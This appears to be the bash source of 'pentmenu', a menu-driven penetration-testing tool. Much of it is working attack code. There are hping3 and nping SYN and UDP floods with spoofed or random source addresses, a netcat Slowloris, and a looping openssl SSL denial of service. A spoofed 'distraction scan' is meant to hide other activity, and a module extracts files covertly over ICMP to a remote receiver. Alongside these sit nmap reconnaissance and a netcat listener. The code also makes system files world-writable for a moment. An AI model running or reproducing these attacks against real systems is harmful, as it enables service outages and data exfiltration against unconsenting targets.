#!/bin/bash
PS3="Pentmenu>"
## MAINMENU
mainmenu()
{
mainmenu=("Recon" "DOS" "Extraction" "Quit")
select opt in "${mainmenu[@]}"; do
	if [ "$opt" = "Quit" ]; then
	echo "Quitting" && sleep 1 && clear
	exit 0
	elif [ "$opt" = "Recon" ]; then
reconmenu
	elif [ "$opt" = "DOS" ]; then
dosmenu
    elif [ "$opt" = "Extraction" ]; then
extractionmenu
	else 
	echo "That's not a valid option! Hit Return to show main menu"
	fi
done
}


## RECONMENU
reconmenu()
{
		reconmenu=("Show IP" "DNS Recon" "Ping Sweep" "Recon Network" "Stealth Scan" "UDP Scan" "Check Server Uptime" "Go back")
	select reconopt in "${reconmenu[@]}"; do
## show external IP
	if [ "$reconopt" = "Show IP" ]; then
		showip
## DNS Recon
    elif [ "$reconopt" = "DNS Recon" ]; then
        dnsrecon
## Ping Sweep
    elif [ "$reconopt" = "Ping Sweep" ]; then
        pingsweep
## Recon Network
    elif [ "$reconopt" = "Recon Network" ]; then
        reconnetwork
## Stealth Scan
    elif [ "$reconopt" = "Stealth Scan" ]; then
        stealthscan
## UDP Scan
	elif [ "$reconopt" = "UDP Scan" ]; then
		udpscan
## Check uptime of server
    elif [ "$reconopt" = "Check Server Uptime" ]; then
        checkuptime
## Go back		
	elif [ "$reconopt" = "Go back" ]; then
		mainmenu
## Default if no menu option selected is to return an error
	else
  		echo  "That's not a valid option! Hit Return to show menu"
	fi
	done
}

## EXTRACTIONMENU
extractionmenu()
{
        extractionmenu=("Extract File via ICMP" "Receive File via ICMP" "Create Listener" "Go back")
    select extractopt in "${extractionmenu[@]}"; do
## Extract file via ICMP
    if [ "$extractopt" = "Extract File via ICMP" ]; then
        icmpextract
## Receive file via ICMP
    elif [ "$extractopt" = "Receive File via ICMP" ]; then
        icmpreceive
## Create an arbitrary listener
    elif [ "$extractopt" = "Create Listener" ]; then
		listener
## Go back
    elif [ "$extractopt" = "Go back" ]; then
        mainmenu
## Default error
    else
        echo "That's not a valid option! Hit Return to show menu"
    fi
    done
}

## DOSMENU
dosmenu()
{
		dosmenu=("TCP SYN Flood" "UDP Flood" "SSL DOS" "Slowloris" "Distraction Scan" "Go back")
	select dosopt in "${dosmenu[@]}"; do
## TCP SYN Flood DOS
 	if [ "$dosopt" = "TCP SYN Flood" ]; then
		synflood
## UDP Flood		
 	elif [ "$dosopt" = "UDP Flood" ]; then
		udpflood
## SSL DOS
	elif [ "$dosopt" = "SSL DOS" ]; then
		ssldos
## Slowloris
	elif [ "$dosopt" = "Slowloris" ]; then
		slowloris
## Distraction scan 
	elif [ "$dosopt" = "Distraction Scan" ]; then
		distractionscan
## Go back	
	elif [ "$dosopt" = "Go back" ]; then
		mainmenu
	else
## Default if no menu option selected is to return an error
  	echo  "That's not a valid option! Hit Return to show menu"
	fi
	done
}
##create DNS Recon function
dnsrecon()
{ echo "This module performs passive recon via forward/reverse name lookups for the target (as appropriate) and performs a whois lookup"
	echo "Enter target:"
	read -i $TARGET -e TARGET
host $TARGET
if ! [[ $? = 0 ]]; then
nslookup $TARGET
fi
sleep 1 && whois -H $TARGET
if ! [[ $? = 0 ]]; then
sleep 1 && curl ipinfo.io/$TARGET
fi
}
## create pingsweep function
pingsweep()
{ echo "This module performs a simple ICMP echo 'ping' sweep"
	echo "Enter target:"
	read -i $TARGET -e TARGET
sudo nmap -sP -PE $TARGET --reason
}
## create stunnel client function
stunnel_client() 
{ echo "use SSL? [y]es or [n]o (default):"
	read SSL
	: ${SSL:=n}
if [[ "$SSL" = "y" ]]
	then echo "Using SSL/TLS"
LHOST=127.0.0.1
LPORT=9991
grep -q $LPORT /etc/services
if [[ $? = 1 ]]
then
echo "Adding pentmenu stunnel service to /etc/services" && sudo chmod 777 /etc/services && sudo echo "pentmenu-stunnel-client 9991/tcp #pentmenu stunnel client listener" >> /etc/services &&  sudo chmod 644 /etc/services
fi
if test -f "/bin/ss"; then 
	LISTPORT=ss; 
	else LISTPORT=netstat
fi
$LISTPORT -tln |grep -q $LPORT
if [[ "$?" = "1" ]]
then
	echo "Creating stunnel client on $LHOST:$LPORT"	
		sudo rm -f /etc/stunnel/pentmenu.conf;
		sudo touch /etc/stunnel/pentmenu.conf && sudo chmod 777 /etc/stunnel/pentmenu.conf
		sudo echo "[PENTMENU-CLIENT]" >> /etc/stunnel/pentmenu.conf
		sudo echo "client=yes" >> /etc/stunnel/pentmenu.conf
		sudo echo "accept=$LHOST:$LPORT" >> /etc/stunnel/pentmenu.conf
		sudo echo "connect=$TARGET:$PORT" >> /etc/stunnel/pentmenu.conf
		sudo echo "verify=0" >> /etc/stunnel/pentmenu.conf
		sudo chmod 644 /etc/stunnel/pentmenu.conf
		sudo stunnel /etc/stunnel/pentmenu.conf && sleep 1
else echo "Looks like stunnel is already listening on port 9991, so not recreating"
fi
fi }

## create TCP SYN flood function
synflood()
{		echo "TCP SYN Flood uses hping3...checking for hping3..."
	if test -f "/usr/sbin/hping3"; then echo "hping3 found, continuing!";
## hping3 is found, so use that for TCP SYN Flood
		echo "Enter target:"
	read -i $TARGET -e TARGET
		echo "Enter target port"
	read -i $PORT -e PORT
		echo "Enter Source IP, or [r]andom or [i]nterface IP (default):"
	read -i $SOURCE -e SOURCE
	: ${SOURCE:=i}
	echo "Send data with SYN packet? [y]es or [n]o (default)"
	read -i $SENDDATA -e SENDDATA
	: ${SENDDATA:=n}
	if [[ $SENDDATA = y ]]; then
	echo "Enter number of data bytes to send (default 3000):"
	read -i $DATA -e DATA
	: ${DATA:=3000}
	if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then
	DATA=3000 && echo "Invalid integer!  Using data length of 3000 bytes"
	fi
	else DATA=0 
	fi
	if [[ "$SOURCE" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then
		echo "Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu"
		sudo hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -S $TARGET
	elif [ "$SOURCE" = "r" ]; then
		echo "Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu"
		sudo hping3 --flood -d $DATA --frag --rand-source -p $PORT -S $TARGET
	elif [ "$SOURCE" = "i" ]; then
		echo "Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu"
		sudo hping3 -d $DATA --flood --frag -p $PORT -S $TARGET
	else echo "Not a valid option!  Using interface IP"
		echo "Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu"
		sudo hping3 --flood -d $DATA --frag -p $PORT -S $TARGET
	fi
## No hping3 so using nping for TCP SYN Flood
	else echo "hping3 not found :( trying nping instead"
		echo ""
		echo "Trying TCP SYN Flood with nping..this will work but is not ideal"
		echo "Enter target:"
	read -i $TARGET -e TARGET
		echo "Enter target port:"
	read PORT
		echo "Enter Source IP or use [i]nterface IP (default):"
	read -i $SOURCE -e SOURCE
		: ${SOURCE:=i}
		echo "Enter number of packets to send per second (default is 10000):"
	read RATE
		: ${RATE:=10000}
		echo "Enter total number of packets to send (default is 100000):"
	read TOTAL
		: ${TOTAL:=100000}
		echo "Starting TCP SYN Flood..."
	if 	[ "$SOURCE" = "i" ]; then
		sudo nping --tcp --dest-port $PORT --flags syn --rate $RATE -c $TOTAL -v-1 $TARGET
	else sudo nping --tcp --dest-port $PORT --flags syn --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET
	fi
	fi
}


## create showip function
showip()
{		echo "External IP lookup uses curl..."
		echo "External IP is detected as:"
		curl http://canihazip.com/s/
		echo ""
		echo ""
		echo "Interface IP's are:"
		ip a|grep inet
	if ! [[ $? = 0 ]]; then
		ifconfig|grep inet
	fi
		echo ""
}

## create slowloris function
slowloris()
{ echo "Using netcat for Slowloris attack...." && sleep 1
echo "Enter target:"
	read -i $TARGET -e TARGET
echo "Target is set to $TARGET"
echo "Enter target port (defaults to 80):"
	read PORT
	: ${PORT:=80}
	if ! [[ "$PORT" =~ ^[0-9]+$ ]]; then
PORT=80 && echo "Invalid port, reverting to port 80"
	elif [ "$PORT" -lt "1" ]; then
PORT=80 && echo "Invalid port number chosen! Reverting port 80"
	elif [ "$PORT" -gt "65535" ]; then
PORT=80 && echo "Invalid port chosen! Reverting to port 80"
	else echo "Using Port $PORT"
	fi

echo "Enter number of connections to open (default 2000):"
		read CONNS
	: ${CONNS:=2000}
	if ! [[ "$CONNS" =~ ^[0-9]+$ ]]; then
CONNS=2000 && echo "Invalid integer!  Using 2000 connections"
	fi

echo "Choose interval between sending headers."
echo "Default is [r]andom, between 5 and 15 seconds, or enter interval in seconds:"
	read INTERVAL
	: ${INTERVAL:=r}
	if [[ "$INTERVAL" = "r" ]]
then
INTERVAL=$((RANDOM % 11 + 5))
	elif ! [[ "$INTERVAL" =~ ^[0-9]+$ ]] && ! [[ "$INTERVAL" = "r" ]]
then
INTERVAL=$((RANDOM % 11 + 5)) && echo "Invalid integer!  Using random value between 5 and 15 seconds"
	fi
stunnel_client
if [[ "$SSL" = "y" ]]
then 
echo "Launching Slowloris....Use 'Ctrl c' to exit prematurely" && sleep 1
	i=1
	while [ "$i" -le "$CONNS" ]; do
echo "Slowloris attack ongoing...this is connection $i, interval is $INTERVAL seconds"; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $LHOST $LPORT  2>/dev/null 1>/dev/null & i=$((i + 1)); done
echo "Opened $CONNS connections....returning to menu"
else 
echo "Launching Slowloris....Use 'Ctrl c' to exit prematurely" && sleep 1
	i=1
	while [ "$i" -le "$CONNS" ]; do
echo "Slowloris attack ongoing...this is connection $i, interval is $INTERVAL seconds"; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $TARGET $PORT  2>/dev/null 1>/dev/null & i=$((i + 1)); done
echo "Opened $CONNS connections....returning to menu"
fi
}

## create distraction scan function
distractionscan()
{ echo "This module will send a TCP SYN scan with a spoofed source address"
echo "This module is designed to be obvious, to distract your target from any real scan or other activity you may actually be performing"
echo "Enter target:"
read -i $TARGET -e TARGET
echo "Enter spoofed source address:"
read -i $SOURCE -e SOURCE
for i in {1..5}; do echo "sending scan $i" && sudo hping3 --scan all --spoof $SOURCE -S $TARGET 2>/dev/null 1>/dev/null; done
exit 0 
}


## create UDP Flood function
udpflood()
{ echo "UDP Flood uses hping3...checking for hping3..."
if test -f "/usr/sbin/hping3"; then echo "hping3 found, continuing!";
## hping3 is found, so use that for UDP Flood
	echo "Enter target:"
		read -i $TARGET -e TARGET
	echo "Enter target port:"
		read PORT
	echo "Enter random string (data to send):"
		read DATA
	echo "Enter Source IP, or [r]andom or [i]nterface IP (default):"
		read -i $SOURCE -e SOURCE
	: ${SOURCE:=i}
	if [[ "$SOURCE" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then
		echo "Starting UDP Flood. Use 'Ctrl c' to end and return to menu"
		sudo hping3 --flood --spoof $SOURCE --udp --sign $DATA -p $PORT $TARGET
	elif [ "$SOURCE" = "r" ]; then
		echo "Starting UDP Flood. Use 'Ctrl c' to end and return to menu"
		sudo hping3 --flood --rand-source --udp --sign $DATA -p $PORT $TARGET
	elif [ "$SOURCE" = "i" ]; then
		echo "Starting UDP Flood. Use 'Ctrl c' to end and return to menu"
		sudo hping3 --flood --udp --sign $DATA -p $PORT $TARGET
	else echo "Not a valid option!  Using interface IP"
		echo "Starting UDP Flood. Use 'Ctrl c' to end and return to menu"
		sudo hping3 --flood --udp --sign $DATA -p $PORT $TARGET
	fi
## No hping3 so using nping for UDP Flood instead
	else echo "hping3 not found :( trying nping instead"
		echo ""
		echo "Trying UDP Flood with nping.."
		echo "Enter target:"
	read -i $TARGET -e TARGET
		echo "Enter target port:"
	read PORT
		echo "Enter Source IP or use [i]nterface IP (default):"
	read -i $SOURCE -e SOURCE
		: ${SOURCE:=i}
		echo "Enter number of packets to send per second (default is 10000):"
	read RATE
		: ${RATE:=10000}
		echo "Enter total number of packets to send (default is 100000):"
	read TOTAL
		: ${TOTAL:=100000}
		echo "Enter string to send (data):"
	read DATA	
		echo "Starting UDP Flood..."
	if 	[ "$SOURCE" = "i" ]; then
		sudo nping --udp --dest-port $PORT --data-string $DATA --rate $RATE -c $TOTAL -v-1 $TARGET
	else sudo nping --udp --dest-port $PORT --data-string $DATA --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET
	fi
fi
}

## create ssldos function
ssldos() 
{ echo "Using openssl for SSL DOS"
		echo "Enter target:"
	read -i $TARGET -e TARGET
		echo "Enter target port (defaults to 443):"
read PORT

: ${PORT:=443}

if  ! [[ "$PORT" =~ ^[0-9]+$ ]]; then 
	PORT=443 && echo "You provided a string, not a port number!  Reverting to port 443"
fi
if [ "$PORT" -lt "1" ]; then
	PORT=443 && echo "Invalid port number chosen!  Reverting to port 443"
elif [ "$PORT" -gt "65535" ]; then
	PORT=443 && echo "Invalid port number chosen!  Reverting to port 443"
else echo "Using port $PORT"
fi
	echo "Use client renegotiation? [y]es or [n]o (default):"
read NEGOTIATE

: ${NEGOTIATE:=n}

if [[ $NEGOTIATE = y ]]; then
	echo "Starting SSL DOS attack...Use 'Ctrl c' to quit" && sleep 1	
while : for i in {1..10} 
	do echo "spawning instance, attempting client renegotiation"; echo "R" | openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & 
done

elif [[ $NEGOTIATE = n ]]; then
	echo "Starting SSL DOS attack...Use 'Ctrl c' to quit" && sleep 1	
while : for i in {1..10} 
	do echo "spawning instance"; openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & 
done

else 
	echo "Invalid option, assuming no client renegotiation"
	echo "Starting SSL DOS attack...Use 'Ctrl c' to quit" && sleep 1	
while : for i in {1..10} 
	do echo "spawning instance"; openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & 
done
fi
}

## create listener function
listener()
	{ echo "This module will create a TCP or UDP listener using netcat"
	echo "Any data (string or file) received will be written out to ./pentmenu.listener.out"
echo "Enter protocol, [t]cp (default) or [u]dp:"
read PROTO
	: ${PROTO:=t}
if [ "$PROTO" != "t" ] && [ "$PROTO" != "u" ]; then
	echo "Invalid protocol option selected, assuming tcp!" && PROTO=t && echo ""
fi
	echo "Listing current listening ports on this system.  Do not attempt to create a listener on one of these ports, it will not work." && echo ""
if test -f "/bin/ss"; then 
	LISTPORT=ss; 
	else LISTPORT=netstat

fi
	$LISTPORT -$PROTO -n -l 
echo "Enter port number (defaults to 8000):"
	read PORT
: ${PORT:=8000}
if  ! [[ "$PORT" =~ ^[0-9]+$ ]]; then 
		PORT=8000 && echo "You provided a string, not a port number!  Reverting to port 8000"
fi
if [ "$PORT" -lt "1" ]; then
		PORT=8000 && echo "Invalid port number chosen!  Reverting to port 8000"
	elif [ "$PORT" -gt "65535" ]; then
		PORT=8000 && echo "Invalid port number chosen!  Reverting to port 8000" 
fi
echo "Enter output file (defaults to pentmenu.listener.out):"
	read -i $OUTFILE -e OUTFILE
	: ${OUTFILE:=pentmenu.listener.out}
echo "Use ctrl c to stop"
if [ "$PROTO" = "t" ] && [ "$PORT" -lt "1025" ]; then
	sudo nc -k -l -v -p $PORT > $OUTFILE
elif  [ "$PROTO" = "t" ] && [ "$PORT" -gt "1024" ]; then
	nc -k -l -v -p $PORT > $OUTFILE
elif  [ "$PROTO" = "u" ] && [ "$PORT" -lt "1025" ]; then
	sudo nc -u -k -l -v -p $PORT > $OUTFILE
elif  [ "$PROTO" = "u" ] && [ "$PORT" -gt "1024" ]; then
	nc -u -k -l -v -p $PORT > $OUTFILE
fi
}


## create a network recon function
reconnetwork()
{ echo "This module conducts a scan of the entire network using nmap"
echo "It will perform a TCP SYN port scan and attempt OS and service identification"
echo "Depending on the network size, the scan might take a long time to finish"
echo "Please enter the target (e.g. 192.168.1.0/24):"
read -i $SUBNET -e SUBNET
sudo nmap -script-args http.useragent="Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" -Pn -sV -sC -A -O $SUBNET --reason
}

## create a stealth scan function
stealthscan()
{ echo "This module lets you scan a host/network very stealthily, using a TCP SYN scan"
echo "Since stealth is important, the scan might take a very long time to finish"
echo "Enter the host/subnet to scan:"
read -i $TARGET -e TARGET
echo "Enter the speed of scan (0 means very slow and 5 means fast).  Default is 3:"
read -i $SPEED -e SPEED
: ${SPEED:=3}
sudo nmap -Pn -sS -T $SPEED $TARGET --reason
}
## udp scan function
udpscan()
{ echo "This module lets you scan a host/network for open UDP ports"
echo "This may take some time"
echo "Enter the host/subnet to scan"
read -i $TARGET -e TARGET
echo "Enter the speed of scan (0 means very slow and 5 means fast).  Default is 3:"
read -i $SPEED -e SPEED
: ${SPEED:=3}
sudo nmap -Pn -sU -T $SPEED $TARGET --reason
}
## icmp file extraction function
icmpextract()
{ echo "This module will help you extract files via the ICMP protocol"
  echo "It can be handy in a firewalled environment where ICMP is not blocked"
  echo "You need an ICMP receiver for this to work (you or a friend can set it up via the receiver module)"
  echo "Enter the receiver IP:"
  read -i $RECEIVER -e RECEIVER
  echo "Enter the FULL PATH of the file you want to extract"
  read -i $EXTRACT -e EXTRACT
  echo "What is your secret sign? (needs to be same on both ends)"
  read -i $SECRET -e SECRET
  SIZE=$(ls -l $EXTRACT | cut -d ' ' -f 5)
#calculate size to include length of secret in bytes
  SECRETSIZE=$(printf "%s" "$SECRET" |wc -c)
  SIZE=$(expr $SIZE + $SECRETSIZE)
  echo "Starting extraction.."
  sudo hping3 $RECEIVER --icmp \
  --sign $SECRET -d $SIZE -c 1 --file $EXTRACT --end
  echo "Done. You can check the file integrity on the receiver using hash values"
}
## icmp receiver module
icmpreceive()
{ echo "This module will help you receive files via the ICMP protocol"
  echo "It can be handy in a firewalled environment where ICMP is not blocked"
  echo "You need an ICMP extractor for this to work (you or a friend can set it up via the extraction module)"
  echo "Enter the extractor IP:"
  read -i $EXTRACTOR -e EXTRACTOR
  echo "Enter the network interface to listen on:"
  read -i $INTERFACE -e INTERFACE
  echo "Enter the output file name:"
  read -i $OUTFILE -e OUTFILE
  echo "What is your secret sign? (needs to be same on both ends):"
  read -i $SECRET -e SECRET
  echo "Starting listener.. Ctrl+C to stop when done."
  sudo hping3 --listen $EXTRACTOR -I $INTERFACE \
  --sign $SECRET > $OUTFILE
  echo "Done, checking filetype.."
  file $OUTFILE
  echo "Done. You can check the integrity using hashing values"
}
## uptime checking function
checkuptime()
{ echo "This module will help you estimate the uptime of a given server."
  echo "Enter your target:"
  read -i $TARGET -e TARGET
  echo "Enter port (default is 80):"
  read -i $PORT -e PORT
  : ${PORT:=80}
  echo "Retries? (3 is ideal and default, 2 might also work)"
  read -i $RETRY -e RETRY
  : ${RETRY:=3}
  echo "Starting.."
  sudo hping3 --tcp-timestamp -S $TARGET -p $PORT -c $RETRY | grep uptime
  echo "Done."
}
## create menu and show welcome message
	clear && echo ""
	echo "Hello and welcome to pentmenu!"
	echo "Please report all bugs, improvements and suggestions to https://github.com/GinjaChris/pentmenu/issues"
	echo "This software is only for responsible, authorised use."
	echo "YOU are responsible for your own actions!"
	echo "Please review the readme at https://raw.githubusercontent.com/GinjaChris/pentmenu/master/README.md before proceeding"
	echo ""
mainmenu
